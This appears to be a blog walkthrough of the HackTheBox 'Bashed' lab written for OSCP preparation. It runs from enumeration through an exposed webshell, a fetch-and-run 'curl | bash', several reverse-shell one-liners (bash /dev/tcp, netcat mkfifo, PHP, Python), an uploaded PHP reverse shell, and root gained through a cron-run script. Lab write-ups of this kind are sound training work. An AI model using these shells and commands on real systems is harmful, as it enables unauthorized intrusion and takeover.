Come one, come all! Who is here for some OSCP knowledge? As promised a new IPPSec write up has arrived! And, I have decided to do a write up for every tutorial in the OSCP prep series found here: IPPSEC OSCP prep videos
Using Cherry Tree to take notes while performing an exploit.
Open Cherry Tree
Ctrl+ N = New Tree
Ctrl+Shift+N = New Branch (Sub Notes for new commands)
PrtSc to take screen shots
Let’s get to the Box!
root@kali:~# nmap -sC -sV -oA nmap/initial IP.OF.TAR.GET
- sC = Default nmap scripts
- sV = Enumerate Version
- oA = Output All formats
Next would be your directory/folder
Then IP of the target
root@kali:~# cat nmap/initial.nmap
- cat allows you to view the contents of the file
We see that port 80 is open and it is running: Apache https 2.4.18 Ubuntu
Copy and past the contents into Cherry Tree
Let’s check the version of Ubuntu running by checking the Apache version.
Open Google and Search for: ubuntu httpd versions
- Click packages.ubuntu.com Apache 2
- We will discover that Xenial 16.04 will be running version 2.4.18
- Enter that discovered information into Cherry Tree
Browse to the IP.OF.TAR.GET and see if it returns a WebPage
- Returns phpbash
- Has a link to a GitHub page
- Browse to the “Exact server” link and see that a webshell program was developed
Browse to the GitHub Page for phpbash
- Copy the code into Cherry Tree
- Create a New Branch and Paste it.. Might be useful later
Now Let’s Run GoBuster on the site for anything useful
Gobuster is a tool used to brute-force:
- URIs (directories and files) in web sites.
- DNS subdomains (with wildcard support).
https://tools.kali.org/web-applications/gobuster
root@kali:~# /opt/gobuster/gobuster -u http://IP.OF.TARGET -w /usr/share/wordlists/dirbuster/directory-lists-2.3-medium.txt
- -w = wordlist
Let’s browse to the different directories we find
- OF.TAR.GET/directory
- Take screenshots of what you find and add it to a new branch
So far we have found:
- php
- min.php
- php
Click on the link: phpbash.php
Run the following:
- Id
- Hostname
- Ifconfig
See what information was returned.
Verifies it was on the server itself.
- Take a screenshot and add it to Cherry Tree
Kill the GoBuster and let’s run a Linux Privelge Checker on the host
root@kali:~# cp /opt/li
root@kali:~# cp /opt/linux_privesc/
root@kali:~# cp /opt/linux_privesc/LinEnum.sh .
root@kali:~# python -m SimpleHTTPServer 80
We are going to Post the enum to the Simple HTTP server
Switch over to the Browser location: IP.OF.TAR.GET/dev/phpbash.php
Run the following:
www-data@bashed:/var/www/html/dev# curl IP.OF.YOU.RPC/LinEnum.sh | bash
- Sad face.. didn’t work
- Tried wget didn’t work here.. let’s change directories
www-data@bashed:/var/www/html/dev# cd /dev/shm
www-data@bashed:/dev/shm# wget IP.OF.YOU.RPC/LinEnum.sh
- It’s running!
www-data@bashed:/dev/shm# ls
- Give it a minute to run
- Copy and Paste all the Output to a new branch in Cherry Tree
When looking through the data, keep this in mind:
- root user has the UID of 0. Most Linux distributions reserve the first 100 UIDs for system use. New users are assigned UIDs starting from 500 or 1000. For example, new users in Ubuntu start from 1000
- When you create a new account, it will usually be give the next-highest unused number. If we create a new user on our Ubuntu system, it will be given the UID of 1001:
We also find we can run sudo without applying a password
Remember.. the phpbash shell is not persistent. When you send commands, it sends them one at a time and respawns a new shell
Need to perform a reverse shell to get a persistent shell
Switch back to your box
PenTestMonkey: Reverse shell cheat sheet:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Let’s set up a listener on our host machine
root@kali:~# nc -lvnp 8081
Switch back to the phpbash shell
www-data@bashed:/dev/shm# bash -i >& /dev/tcp/IP.OF.YOU.RPC/8081 0>&1
- No call back.. let’s try the Net Cat one.. more reliable!
www-data@bashed:/dev/shm# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP.OF.YOU.RPC 8081 >/tmp/f
- Still no shell.. hmmm let’s try the PHP One
www-data@bashed:/dev/shm# php -r ‘$sock=fsockopen(“IP.OF.YOU.RPC”,8081);exec(“/bin/sh -i <&3 >&3 2>&3”); · Hmmm still no shell. Let’s go back and review phpbash code· We discover that it is appending a redirect· Let’s try uploading a reverse shell, then executing it If you remember from GoBuster there was a /uploads directory www-data@bashed:/dev/shm# cd /var/www/html/uploads www-data@bashed:/var/www.html/uploads# ls· Nothing in therewww-data@bashed:/var/www.html/uploads# touch test · This will create a file in the directoryIn your Browses go back to:
http://IP.OF.TAR.GET/uploads/test
· The file is present! We know because we didn’t get a 404 errorWith our nc listener still running, let’s create a php reverse shell
- The PhP rever shell is on Kali Linux by default
Open another terminal window
root@kali:~# cp /opt/shell/php/php-reverse-shell.php .
- Now that we have copied it into our directory, let’s verify some settings
root@kali:~# vi php-reverse-shell.php
- Check the IP (your IP)
- Port: 8081
Now let’s ensure our Python Simple HTTP Server is still running
root@kali:~# python -m SimpleHTTPServer 80
- . still running yeah?
Switch back to the Browser php shell
www-data@bashed:/var/www.html/uploads# wget 10.10.14.30/php-reverse-shell.php
It is uploaded.. now navigate to it
http://IP.OF.TAR.GET/uploads/php-reverse-shell.php
Switch back to your terminal where Net Cat listener is running
Sweet.. we got a shell
$ id
- To see who we are (rights)
$ python -c ‘import pty;pty.spawn(“/bin/bash”)’
- Now we have a bash shell
www-data@bashed:/$ ^Z
^=ctrl
root@kali:~# sty raw -echo
root@kali:~# nc -lvnp 8081
www-data@bashed:/$ sudo -u scriptmanager bash
scriptmanager@bashed:/$ id
- Now we are the scriptmanager user
scriptmanager@bashed:/$ ls -la
- We see a folder called scripts.. most likely belongs to the scriptmanager
scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
- py
- txt
scriptmanager@bashed:/scripts$ date
- If we keep running the date command we will see that test.txt keeps getting updated every minute
- Let’s take a look at that test.py and see what it is doing but first lets bring our bash commands back in
scriptmanager@bashed:/scripts$ python -c ‘import pty;pty.spawn(“/bin/bash”)’
scriptmanager@bashed:/scripts$ vi test.py
- We see that it opening test.txt, writing ‘testting 123!’ to it and then closing it
Let’s edit that test.py
And paste in the python reverse shell code from PentTestMonkey
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Note: Make sure you edit this to make applicable
- Get rid of the semicolons and make them new lines
- Change the IP to your machine
Now let’s run our newly edited test.py
scriptmanager@bashed:/scripts$ test.py
Go back to terminal and run a new listener
root@kali:~# nc -lvnp 1234
- Now would be a good time add some notes to CherryTree
- Did you get a shell? I got a shell… totes got a shell
- Guess what.. we also got root.. because root owns the test.txt file
# id
Uid=(root)
Note: You may have to stop and start the listener a few times.
# cd /root
# ls
- We see root.txt
# wc -c root.txt
- Its 32 characters which tells us its an md5sum
Yay!!! All done.. we kick arse!
#donecodealone